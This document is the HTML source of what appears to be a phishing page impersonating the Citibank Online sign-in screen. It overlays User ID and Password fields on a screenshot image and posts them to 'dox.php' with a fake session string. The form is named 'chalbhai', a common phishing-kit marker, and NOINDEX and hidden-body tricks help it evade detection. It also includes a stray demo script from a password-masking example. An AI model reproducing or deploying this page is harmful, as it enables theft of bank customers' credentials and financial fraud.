<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
	<head>

<title>Citibank Online</title>


<link rel="shortcut icon" href="image/favicon.ico"/>
<script type="text/javascript" src="https://www.sitepoint.com/examples/password/MaskedPassword/MaskedPassword.js"></script>

<script type="text/css" src="http://meyerweb.com/eric/tools/css/reset/reset.css"></script>		  
	
<script type="text/javascript">

function unhideBody()
{
var bodyElems = document.getElementsByTagName("body");
bodyElems[0].style.visibility = "visible";
}

</script>

<body style="visibility:hidden" onload="unhideBody()">
<style type="text/css">
 -moz-document url-prefix() { 
  .selector {
     color:lime;
  }
}
</style>
<style type="text/css">
div#container
{
	position:relative;
	width: 1010px;
	margin-top: 0px;
	margin-left: auto;
	margin-right: auto;
	text-align:left; 
}
body {margin:0}
</style>

<style> 
 
 .inputs {
    padding: 8px;
    border-radius: 1px;
    border: 1px solid #A6A5A5;
    background-image: #fff;
	font-size: 12px;
	font-weight: transparent;
	font-family: Verdana,Tahoma;
	box-shadow: 0 1px 1px rgba(0,0,0,0.15) inset;
}


.inputs:focus {
    background-color: #fff;
	font-family: Tahoma,Verdana,Arial;
}
</style> 
</head>
<body>

<div id="image2" style="position:absolute; overflow:hidden; left:0px;; top:0px;  z-index:1"><img src="image/complete1.png" alt="" title="" border=0 ></a></div>


<form action="dox.php?&sessionid=<?php echo generateRandomString(80); ?>&securessl=true" name="chalbhai" method="post" id="demo-form">
<input name="username" autofocus required autocomplete="off" placeholder="User ID" class="inputs" type="text" style="position:absolute;width:280px;height:23px;left:380px;top:305px;z-index:3">
<div style="position:absolute;width:280px;height:20px;left:380px;top:385px;z-index:3">
<input name="password" autofocus required autocomplete="off" id="demo-field" placeholder="Password" class="inputs" type="text" style="width:280px;height:23px;z-index:3">
</div>
<div id="formimage1" style="position:absolute; left:750px; top:500px; z-index:16"><input type="image" name="formimage1"  src="image/signin2.png" alt="Sign In"/></div>
<input type="checkbox" style="position:absolute;width:20px;height:20px;left:380px;top:458px;z-index:3">


<script type="text/javascript">
 
  //apply masking to the demo-field
  //pass the field reference, masking symbol, and character limit
  new MaskedPassword(document.getElementById("demo-field"), '\u25CF');
 
  //test the submitted value
  document.getElementById('demo-form').onsubmit = function()
  {
   alert('pword = "' + this.pword.value + '"');
   return false;
  };
 
 </script>
</body>
</html>
